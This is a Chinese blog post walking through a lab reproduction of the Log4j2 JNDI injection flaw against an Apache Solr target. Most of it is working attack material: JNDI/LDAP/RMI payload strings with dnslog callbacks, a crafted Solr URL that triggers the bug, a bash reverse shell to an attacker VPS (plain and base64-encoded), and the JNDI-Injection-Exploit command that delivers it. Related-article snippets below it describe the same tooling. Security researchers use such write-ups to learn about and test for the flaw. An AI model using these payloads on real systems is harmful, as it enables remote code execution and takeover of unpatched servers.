Log4j2漏洞复现

已于 2022-05-25 15:02:11 修改
阅读量2.9k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
于 2022-02-16 15:46:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46222050/article/details/122964963
版权

Log4j2漏洞复现

payload :

${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}
${jndi:ldap://sb6vjj.dnslog.cn/exp}
1.环境配置:

靶机:kali220

vps:centos

攻击机:win10

2.测试漏洞

在这里插入图片描述

漏洞点在action参数,将poc输入之前,要现在dnslog申请一个地址。

在这里插入图片描述

构造payload:http://192.168.200.128:8983/solr/admin/cores?action=${jndi:ldap://xjgke4.dnslog.cn/exp}

在这里插入图片描述

获得回显,说明存在漏洞。

3.反弹shell

反弹shell的命令

bash -i >& /dev/tcp/vps_ip/9999 0>&1

里面的vps_ip是你要反弹shell的主机ip,9999是要监听的端口。注意了,用windos系统是弹不会shell的,因为bash -i不是windows的命令。

如我这里用的是192.168.200.133,进行编码:
编码的站点如下:

https://www.jackson-t.ca/runtime-exec-payloads.html

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2mdXOwmR-1644997111920)(C:\Users\67348\AppData\Roaming\Typora\typora-user-images\image-20220204203556105.png)]

将bash编码的复制,然后运行漏洞利用的jar文件:
下载地址:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzMvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.200.133"

-C是编码后的内容,-A是反弹shell的ip地址。
注意要先nc监听6666端口.

在这里插入图片描述

使用生产的payload进行攻击rmi://192.168.200.133:1099/9mxiep

在这里插入图片描述

由于多个payload ,你可以一个一个去尝试。

在这里插入图片描述

山巅自相逢
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2漏洞检测工具
05-07
1、检测项目中是否存在log4j的漏洞 2、工作使用
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
Log4j2远程执行代码漏洞如何攻击? 又如何修
琦彦
01-06 9153
Log4j2远程执行代码漏洞如何攻击? 又如何修
log4j2远程代码执行漏洞
最新发布
jsxztshaohaibo的博客
03-08 854
4. 启动一个http服务,配置使其可以访问上一步生成的.class文件,能使用http://127.0.0.1:4444/Exploit.class访问即可,注意4444是作者启动的http服务端口,可以根据自己情况修改,这个URL在下面会用到。上面命令中的http://127.0.0.1:4444/#Exploit是第四步中的地址,根据自己的情况可自行修改,1389是ladp服务默认端口,无需修改。切换到ldap服务的控制台,可以看到日志,说明登录接口中的log4j已经访问ladp服务了。
log4j2远程代码执行漏洞学习总结
heheyixiao233的博客
01-01 3385
log4j2远程代码执行漏洞学习总结 背景 近期log4j2的漏洞闹得沸沸扬扬,在工作之余也是找了一些资料看一下相关的内容,到在网上的总结已经很全了,B站上有各种漏洞,各大博客类网站关于JNDI相关漏洞又重新被翻了出来,我这里主要是做一些我自己的总结和理解,以及我个人对漏洞,当然很多内容包括整个实验流程很多都是从网上制的,虽然是个缝合怪,但实验的代码和总结是自己的,不会像网上某些文章,无脑CV过来,有的还不全。在文章最后会给出我看到的比较好的各种资料。 不过江湖惯例,警告还是要放的 中华人民
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3492
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
log4j2 JNDI注入漏洞问题
逗神的博客
12-13 4624
log4j2 JNDI注入漏洞问题
log4j2远程代码执行漏洞原理与漏洞(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
从0到1java安全5
qq_29948489的博客
05-19 288
在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上是标准的数据交换格式。分析漏洞利用,输出转换的数据类型(类),有一个@type的参数,默认有但是不显示,这里使用 SerializerFeature.WriteClassName,来显示这个参数。我们IDEA设置Maven的时候可以看到,其实IDEA已经自带了Maven,直接配置IDEA中的Maven可以省去下载Maven的步骤了。
【实战】一次简单的log4j漏洞测试
crowsec
12-19 3089
【实战】一次简单的log4j漏洞测试
网络安全深入学习第四课——热门框架漏洞(RCE— Log4j2远程代码执行)
p36273的博客
09-16 936
上面第2、3、4、5步都是在攻击者端操作,只有第6步是在普通前端操作。上面一共开启了3个端口,分别是80、1234、9999。这分别对应的是:web服务、接收反弹shell的、ldap服务。------ Log4j2漏洞总的来说就是:因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。
java asm jndi_JNDI-Injection-Exploit JNDI注入利用工具
weixin_36368271的博客
02-16 1916
介绍JNDI注入利用工具,生成JNDI链接并启动后端相关服务,可用于Fastjson、Jackson等相关使用可执行程序为jar包,在命令行中运行以下命令:$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]其中:-C - 远程class文件中要执行的命令。(可选项 , 默认命令是...
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 4677
​ Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
Log4j2_RCE漏洞
Le1a's Blog
12-16 1961
log4j2_RCE漏洞 这里是用了两种工具来漏洞 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法 靶机地址:http://vulfocus.fofa.so/ 工具地址:https://www.lanzoup.com/i8Aa4xo5gmf 密码:Le1a 访问靶机地址 先把 工具上传到VPS上,然后运行 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(b
漏洞】海康威视综合安防管理平台Fastjson远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
04-28 7524
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
apache log4j2 漏洞
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实远程代码执行。该漏洞已被广泛利用,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值